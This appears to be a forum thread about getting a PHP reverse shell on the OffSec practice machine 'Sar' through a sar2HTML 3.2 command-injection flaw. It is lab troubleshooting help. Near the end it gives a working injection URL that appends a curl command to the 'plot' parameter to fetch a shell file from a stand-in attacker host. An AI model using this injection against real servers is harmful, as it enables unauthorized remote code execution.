php Reverse Shell

Can anyone help me with this issue:
I get the reverse shell from my attacking/kali machine. Don’t know what I am doing wrong it used to work earlier.
I am uploading shell on web server with sar2HTML 3.2 vulnerability. I am using wget. I see that file is uploaded on server but when I browse to shell it don’t connect and when I click back button I get shell from my own machine.

A screenshot:
https://drive.google.com/file/d/19L3SVZzf_mFzTNcMNL7w5xzX6GoVWg4q/view?usp=sharing

First off, I’d suspect you haven’t uploaded the shell. I am not sure why the back button is triggering it though.

I have update the ip address and port number. are you talking about any version upgrade?

No.

I mean I’d suspect you haven’t uploaded the shell to the target website. If it isn’t responding, it probably isn’t there.

Sorry I read it wrong.
I have listed the directory of web server it’s there. and if its not there it should return 404. but I get a blank page. sometimes I get error connection reset by kali:port. I tried to reset vpn connection and restarting nc listener. but I don’t get shell. I think the issue is somehow related that why I get shell from my own host.

Is it possible that I used wget and webserver is executing shell from wget link and not executing the one stored on web server.
It’s offsec machine “Sar”. Have you tried that machine its easy one and in play section maybe you can try if you have time.

@happykharoud said:

Sorry I read it wrong.
I have listed the directory of web server it’s there. and if its not there it should return 404.

Should but not always. This can be configured by the website admin to perform any action they want it to.

but I get a blank page.

Are you 100% sure that this is a valid attack for the application?

When you view source do you see anything?

Have you tried this with other PHP scripts, possibly putting in specific strings so you can test what is happening?

sometimes I get error connection reset by kali:port.

Is there a firewall in the way?

I tried to reset vpn connection and restarting nc listener. but I don’t get shell. I think the issue is somehow related that why I get shell from my own host.

Possibly but I cant see a way that a script on a remote site is giving you a shell on your own host. That strongly implies you are triggering a script on your local machine instead of the remote one.

If the shell you’ve uploaded was able to push a shell from your machine to your machine it would be pretty weird.

Is it possible that I used wget and webserver is executing shell from wget link and not executing the one stored on web server.

Hmm. Not really. Wget doesn’t make code executable and doesn’t run code as such. It would be super weird if it had implanted a link back to your machine.

From the server it takes the HTTP request for the page, finds the related file and passes it to the PHP processor. This is when you want it to create your shell. I’ve no idea how you can make the server push a shell from your machine at this point.

It is much more likely that your upload is somehow broken and you are actually calling the shell off your machine.

If you run tcpdump or wireshark, you can capture the raw traffic flow and if you use burp you can watch the request/response content. This will give you a good pointer as to what is happening.

It’s offsec machine “Sar”. Have you tried that machine its easy one and in play section maybe you can try if you have time.

Never seen it - never looked at the Offsec stuff, sorry.

Type your comment> @TazWake said:

Should but not always. This can be configured by the website admin to perform any action they want it to.
It should give 404 because I have seen 404 page on this host when requesting other page that don’t exist
Are you 100% sure that this is a valid attack for the application?
I read few walkthroughs they use php script for reverse shell but no one have posted the content of their script. All of them used the same command injection as me.
When you view source do you see anything?
No I don’t see anything
Have you tried this with other PHP scripts, possibly putting in specific strings so you can test what is happening?
I tried this one:

sometimes I get error connection reset by kali:port.

Is there a firewall in the way?
No there isn’t any firewall but is it possible nc listening on eth0 and I am trying the ip of tun0 which I should

I tried to reset vpn connection and restarting nc listener. but I don’t get shell. I think the issue is somehow related that why I get shell from my own host.

sorry HTB is not letting me to post that php script here

I have a update:
I was able to get shell using this command
It’s url injection so

victim/index.php?plot=;curl http://attacker/shell.txt --output shel.php
so I got the shell when I tried to list and see why wget wasn’t working it was stored as result of that script you can see in screenshot here

https://drive.google.com/file/d/1nep7nHct4RjZrWl8cGUiPK1SpzxmgiXp/view?usp=sharing

Awesome, glad it is solved.